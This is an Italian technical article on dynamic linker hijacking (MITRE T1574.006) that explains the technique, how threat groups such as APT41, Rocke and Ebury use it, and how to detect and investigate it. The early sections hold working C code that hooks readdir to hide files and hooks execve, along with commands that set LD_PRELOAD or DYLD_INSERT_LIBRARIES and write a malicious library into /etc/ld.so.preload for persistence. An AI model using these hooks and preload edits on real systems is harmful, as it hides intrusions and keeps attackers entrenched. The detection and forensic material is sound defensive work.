Hijacking del Dynamic Linker: Dynamic Linker Hijacking (T1574.006)

Per comprendere l'efficacia di questa tecnica, iniziamo creando una libreria malevola che intercetta la funzione readdir. Questa dimostrazione nasconde file specifici dai comandi di listing:

// evil_lib.c - Compila con: gcc -shared -fPIC evil_lib.c -o evil.so
#include <dlfcn.h>
#include <dirent.h>
struct dirent *readdir(DIR *dirp) {
    struct dirent *(*original_readdir)(DIR *) = dlsym(RTLD_NEXT, "readdir");
    struct dirent *dir;
    while ((dir = original_readdir(dirp)) != NULL) {
        if (strstr(dir->d_name, "backdoor") == NULL) return dir;
    }
    return NULL;
}

L'iniezione su Linux avviene attraverso LD_PRELOAD:

export LD_PRELOAD=/tmp/evil.so

Per rendere persistente l'hijacking, APT41 e Rocke modificano /etc/ld.so.preload. Questo file viene consultato automaticamente dal linker per ogni nuovo processo:

echo "/tmp/evil.so" >> /etc/ld.so.preload

Su macOS, la tecnica sfrutta variabili diverse. XCSSET utilizza questo approccio modificando:

export DYLD_INSERT_LIBRARIES=/tmp/evil.dylib export DYLD_LIBRARY_PATH=/tmp:$DYLD_LIBRARY_PATH

Per testare l'hooking di execve e nascondere processi, create una libreria che intercetta questa syscall fondamentale. Ebury implementa hooks su system, popen, e tutte le varianti di exec per iniettarsi nei sottoprocessi SSH:

int execve(const char *pathname, char *const argv[], char *const envp[]) {
    int (*original_execve)(const char*, char*const[], char*const[]) = dlsym(RTLD_NEXT, "execve");
    // Log o modifica parametri prima dell'esecuzione
    return original_execve(pathname, argv, envp);
}

Aquatic Panda dimostra una variante avanzata modificando direttamente ld.so per caricare il malware Winnti. Questa tecnica sopravvive anche quando LD_PRELOAD viene rimosso dall'ambiente.

Per simulare l'attacco di HiddenWasp, che aggiunge se stesso come shared object:

cp malware.so /lib/x86_64-linux-gnu/libprocesshider.so echo "/lib/x86_64-linux-gnu/libprocesshider.so" > /etc/ld.so.preload

Il rilevamento efficace richiede correlazione tra eventi di modifica file e caricamento librerie. Configurate auditd per catturare modifiche a /etc/ld.so.preload e creazione di file .so in directory sospette:

-w /etc/ld.so.preload -p wa -k linker_hijack -w /tmp -p w -k tmp_libraries -F name=.so*

Gli eventi chiave da monitorare includono syscall execve con variabili LD_PRELOAD definite. Un pattern comune negli attacchi reali mostra questa sequenza: creazione di un file .so in /tmp, seguito da export di LD_PRELOAD, e infine esecuzione di comandi di sistema.

MEDUSA e COATHANGER dimostrano tecniche avanzate che richiedono detection comportamentale. Monitorate processi che caricano librerie da path non standard utilizzando osquery:

SELECT * FROM process_envs 
WHERE key LIKE 'LD_%' OR key LIKE 'DYLD_%'
AND value NOT LIKE '/usr/lib%';

La correlazione temporale è critica. Quando rilevate la creazione di un nuovo file .so, verificate entro 60 secondi se processi successivi lo caricano. Hildegard modifica /etc/ld.so.preload e immediatamente esegue comandi per nascondere la sua presenza.

Per macOS, il unified log cattura eventi DYLD_INSERT_LIBRARIES. Cercate anomalie nel caricamento di dylib:

log show --predicate 'eventMessage contains "DYLD"' --last 1h

I falsi positivi provengono principalmente da ambienti di sviluppo. Create baseline per distinguere l'uso legittimo (debugging, testing) da quello malevolo. Gli sviluppatori usano tipicamente LD_PRELOAD per librerie in directory del progetto, mentre gli attaccanti preferiscono /tmp o directory di sistema.

Implementate alert per correlazioni specifiche: modifica di shell initialization files (.bashrc, .profile) che aggiungono export di variabili linker, seguita da connessioni di rete anomale o creazione di nuovi processi privilegiati.

L'analisi forense di dynamic linker hijacking richiede l'esame di multiple fonti di artefatti. Iniziate verificando /etc/ld.so.preload e confrontatelo con backup o sistemi puliti. La presenza di librerie non standard indica compromissione.

Esaminate i timestamp di modifica dei file di configurazione shell. Rocke modifica /etc/ld.so.preload per nascondere il mining software, lasciando tracce nei log di auditd. La sequenza tipica mostra: download del payload, compilazione della libreria malevola, modifica del preload file, e restart di servizi critici.

Per ricostruire l'attività di Ebury su server SSH, analizzate /var/log/secure cercando anomalie nelle sessioni. Il malware inietta la sua libreria in ogni processo figlio di sshd, creando pattern identificabili di caricamento moduli.

La memoria dei processi compromessi contiene evidenze cruciali. Utilizzate volatility per estrarre le mappe di memoria:

volatility -f memory.dump linux_proc_maps | grep -E "(LD_|DYLD_)"

Le librerie iniettate appaiono come moduli caricati da path inusuali. HiddenWasp lascia tracce nella sezione delle librerie condivise dei processi infetti, visibili attraverso /proc/[pid]/maps.

Per XCSSET su macOS, esaminate i plist files in ~/Library/LaunchAgents/ che possono contenere variabili DYLD_INSERT_LIBRARIES. Il malware modifica questi file per garantire persistenza attraverso i riavvii.

La timeline reconstruction deve correlare: modifiche ai file di configurazione del linker, creazione di nuove librerie .so/.dylib, primi processi che caricano queste librerie, e attività malevola successiva (connessioni C2, lateral movement). APT41 tipicamente usa questa tecnica nelle prime 24 ore post-compromissione per stabilire persistenza prima di procedere con movimenti laterali.

APT41 utilizza dynamic linker hijacking come tecnica di persistenza preferenziale negli attacchi a infrastrutture Linux. Il gruppo configura payload per caricarsi via LD_PRELOAD, spesso combinando questa tecnica con web shells per mantenere accessi ridondanti. La loro implementazione è sofisticata: utilizzano nomi di librerie che mimano componenti di sistema legittimi.

Rocke, specializzato in cryptomining, ha standardizzato l'uso di /etc/ld.so.preload per nascondere i processi di mining. Il loro pattern operativo include: compromissione iniziale via exploit di servizi esposti, download di librerie pre-compilate per diverse architetture, e modifica sistematica dei meccanismi di listing per occultare xmrig e componenti associati.

Aquatic Panda dimostra evoluzione tattica modificando direttamente ld.so invece di affidarsi solo a variabili d'ambiente. Questa scelta indica comprensione profonda dei meccanismi Linux e volontà di investire tempo per persistence mechanisms più robusti. Il gruppo utilizza questa tecnica specificamente per mantenere Winnti su server critici.

L'overlap negli strumenti è significativo. Ebury, HiddenWasp e Hildegard condividono pattern di hooking simili, suggerendo possibile condivisione di codice o sviluppatori comuni nel underground market. Tutti e tre implementano hooks su funzioni di file system (readdir, stat) e process management (kill, execve).

I trend geografici mostrano concentrazione di questa tecnica in campagne contro infrastructure Linux in cloud providers asiatici. La preferenza per dynamic linker hijacking correla con la prevalenza di sistemi Linux in questi ambienti e la difficoltà di detection con soluzioni EDR tradizionali.

COATHANGER rappresenta l'evoluzione più recente, iniettando codice direttamente nel processo con PID 1. Questa escalation suggerisce che i gruppi APT stanno investendo in tecniche sempre più invasive per garantire persistence anche in ambienti containerizzati dove i restart sono frequenti.

Framework MITRE ATT&CK T1574.006. Campagne documentate: APT41 LD_PRELOAD operations, Rocke cryptomining infrastructure, Aquatic Panda Winnti deployment. Detection strategies: auditd configuration per Linux environments, macOS unified logging per DYLD monitoring. Risorse di mitigazione: SELinux policy development, macOS SIP documentation, execution prevention tramite application control solutions.